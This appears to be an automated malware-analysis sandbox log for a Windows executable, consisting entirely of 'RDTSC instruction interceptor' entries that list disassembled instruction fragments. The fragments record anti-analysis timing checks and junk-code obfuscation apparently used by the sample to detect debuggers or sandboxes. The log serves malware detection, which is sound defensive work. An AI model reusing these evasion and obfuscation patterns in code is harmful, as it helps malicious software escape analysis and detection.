Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D01 second address: AE9D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D07 second address: AE9D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2C21h] 0x00000012 push 00000000h 0x00000014 mov dx, di 0x00000017 call 00007F0AD95F8829h 0x0000001c jnp 00007F0AD95F8832h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D53 second address: AE9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D57 second address: AE9DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0AD95F8837h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0AD95F8830h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007F0AD95F8826h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DA1 second address: AE9DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DBE second address: AE9E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, 72B4BA4Bh 0x00000010 mov dword ptr [ebp+122D37E6h], ecx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 je 00007F0AD95F882Ch 0x00000038 mov dword ptr [ebp+122D274Fh], edx 0x0000003e push 00000000h 0x00000040 or edi, dword ptr [ebp+122D2A5Dh] 0x00000046 push 00000003h 0x00000048 jmp 00007F0AD95F8837h 0x0000004d call 00007F0AD95F8829h 0x00000052 jmp 00007F0AD95F8831h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9E47 second address: AE9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9E4B second address: AE9EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007F0AD95F882Fh 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jno 00007F0AD95F8840h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F0AD95F882Ch 0x00000030 jg 00007F0AD95F8826h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EA5 second address: AE9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EAB second address: AE9EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EAF second address: AE9ED6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D1B3Dh], ebx 0x00000013 lea ebx, dword ptr [ebp+1244FC0Ch] 0x00000019 add dword ptr [ebp+122D27BEh], edx 0x0000001f mov edi, edx 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA089 second address: AEA08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA08D second address: AEA091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA19C second address: AEA1E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 22BA316Ah 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0AD95F8828h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov cx, B331h 0x00000030 lea ebx, dword ptr [ebp+1244FC20h] 0x00000036 add edi, 067E2900h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F0AD95F8828h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0992B second address: B09931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09AA9 second address: B09ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD95F8830h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09ADA second address: B09AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F0AD8C6A9BEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09AF2 second address: B09B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09EE9 second address: B09EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09EED second address: B09F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8833h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A06F second address: B0A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0AD8C6A9B6h 0x00000011 jmp 00007F0AD8C6A9BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1D5 second address: B0A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1DB second address: B0A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1DF second address: B0A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1E5 second address: B0A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A202 second address: B0A24D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0AD95F882Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F0AD95F882Ah 0x0000001a jmp 00007F0AD95F882Ch 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0AD95F8833h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A24D second address: B0A251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A251 second address: B0A255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A255 second address: B0A25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A25B second address: B0A279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jo 00007F0AD95F883Ch 0x0000000c jmp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A3AE second address: B0A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD8C6A9C5h 0x0000000b jmp 00007F0AD8C6A9BDh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A70D second address: B0A736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD95F8836h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A898 second address: B0A8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F0AD8C6A9B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8AB second address: B0A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8BC second address: B0A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8D0 second address: B0A8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8D6 second address: B0A8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8DA second address: B0A8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B239 second address: B0B23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B3C8 second address: B0B3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8831h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B3DF second address: B0B3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B51D second address: B0B53D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0AD95F8836h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B53D second address: B0B55A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B86C second address: B0B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B165D0 second address: B16601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 jmp 00007F0AD8C6A9C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F0AD8C6A9BEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B168B7 second address: B168BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16B33 second address: B16B47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0AD8C6A9B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DCA second address: B16DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0AD95F8826h 0x00000009 jnl 00007F0AD95F8826h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 je 00007F0AD95F882Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DE4 second address: B16DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0AD8C6A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DF8 second address: B16E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16E0E second address: B16E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18F7D second address: B18F87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18F87 second address: B18FCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F0AD8C6A9CAh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0AD8C6A9BEh 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193B5 second address: B193BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193BF second address: B193CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193CF second address: B193D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193D3 second address: B193E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19C01 second address: B19C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19C09 second address: B19C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A0AF second address: B1A0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A13F second address: B1A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A1C7 second address: B1A1D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A63E second address: B1A67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add esi, dword ptr [ebp+122D3580h] 0x00000012 push 00000000h 0x00000014 ja 00007F0AD8C6A9BCh 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D2D45h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A67A second address: B1A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A67E second address: B1A684 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AF82 second address: B1AF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AF9A second address: B1AFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1C0AC second address: B1C129 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F0AD95F8826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0AD95F8828h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F0AD95F8837h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0AD95F8828h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+1244EE55h], edi 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5DF second address: B1D5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D2F8 second address: B1D317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD95F8834h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5E3 second address: B1D5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5E9 second address: B1D5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5EF second address: B1D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21DEE second address: B21DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21DF2 second address: B21DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22EB3 second address: B22EBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22EBD second address: B22ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0AD8C6A9C2h 0x0000000d jbe 00007F0AD8C6A9BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2403A second address: B24056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0AD95F8826h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24056 second address: B2405A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2405A second address: B240BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0AD95F8828h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1D80h], ecx 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+12450094h], eax 0x0000002f pop edi 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+1246257Ah], ecx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122DB8C3h], ecx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0AD95F8835h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F37 second address: B24F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F3B second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
